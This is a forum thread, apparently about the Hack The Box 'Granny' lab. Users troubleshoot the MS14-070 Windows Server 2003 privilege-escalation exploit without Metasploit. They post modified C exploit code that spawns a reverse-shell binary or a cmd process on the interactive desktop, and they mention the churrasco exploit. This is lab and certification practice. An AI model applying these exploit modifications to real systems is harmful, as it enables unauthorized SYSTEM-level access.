Granny privesc (MS14-070) WITHOUT meterpreter

Hi,

I'm trying to pwn Granny again, without meterpreter. I'm stuck with privesc (MS14-070: Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070) - Windows local Exploit).

I modified the exploit like this:

BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation)
{
        ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO));
        startupInformation->cb = sizeof (STARTUPINFO);
        ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION));
 
        // Start the child process.
        return CreateProcess (
                NULL,                                                           // No module name (use command line)
                //"c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32",   // Start cmd.exe
                "c:\\Inetpub\\wwwroot\\revshell.exe",   // Start reverse shell

                NULL,                                                           // Process handle not inheritable
                NULL,                                                           // Thread handle not inheritable
                TRUE,                                                           // Set handle inheritance to TRUE
                0,                                                              // No creation flags
                NULL,                                                           // Use parent's environment block
                NULL,                                                           // Use parent's starting directory
                &startupInformation[0],                                         // Pointer to STARTUPINFO structure
                &processInformation[0]                                          // Pointer to PROCESS_INFORMATION structure
        );
}

When I execute this exploit from cmd.exe (or from a command shell spawned by meterpreter), it spawns a reverse shell, but the shell dies right after. It does not matter which payload I use (meterpreter, windows_reverse_shell, ncat.exe, etc.).

But, when I execute -f MS14-070.exe from meterpreter, it opens just fine.

How can I get the same behaviour as meterpreter's execute -f from cmd.exe?

In this video, the user has the exact same problem (he finally managed to get a reverse shell, but used meterpreter's execute -f command):

Hey man, I'm stuck at the same point. Did you find a way to solve it?

cmd /K or start

Hi,

Try this:

#include <windows.h>
#include <stdlib.h>     // malloc / free

BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation)
{
        BOOL created;
        LPTSTR lpComspec;

        ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO));
        startupInformation->cb = sizeof (STARTUPINFO);
        // Attach the child to the interactive window station / desktop
        startupInformation->lpDesktop = "WinSta0\\Default";
        ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION));

        // Resolve the command interpreter from %COMSPEC% (normally cmd.exe)
        lpComspec = (LPTSTR) malloc (1024 * sizeof (TCHAR));
        if (lpComspec == NULL || GetEnvironmentVariable ("comspec", lpComspec, 1024) == 0)
        {
                free (lpComspec);
                return FALSE;
        }

        created = CreateProcess (
                lpComspec,                      // Application name: the interpreter from %COMSPEC%
                NULL,                           // No additional command line
                NULL,                           // Process handle not inheritable
                NULL,                           // Thread handle not inheritable
                TRUE,                           // Set handle inheritance to TRUE
                0,                              // No creation flags
                NULL,                           // Use parent's environment block
                NULL,                           // Use parent's starting directory
                &startupInformation[0],         // Pointer to STARTUPINFO structure
                &processInformation[0]          // Pointer to PROCESS_INFORMATION structure
        );

        free (lpComspec);
        return created;
}

@hackerintshell that will only work if you have an interactive session, meaning remote desktop or at the actual keyboard. And it would only pop a console window, not actually run anything else.

The issue is the /C, which closes the console as soon as the command has run, terminating any threads living in the background. /K will keep it open, along with any children it’s started.

@scud78 I tried it now and it worked for me. The EoP was made in the same reverse shell.

@hackerintshell how? %comspec% is just cmd, and you’re not passing any arguments.

@hackerintshell I just logged in to thank you, it works! :)

Could you upload the binary?

I’ve spent around 3 hours today fighting with this box without MSF. Like others, I’m heading toward the OSCP and am doing my best to avoid Metasploit.

It can be done. My experience was buggy, the reverse shell would time out each time in under a minute. You need the churrasco exploit. The forum keeps blocking me if I try to give any more detail.

@hackerintshell Amazing! It works.

It would be really nice if you could explain the details of this change and why it is needed. It seems like it needs some kind of desktop environment session?

I will give you my respect! Thanks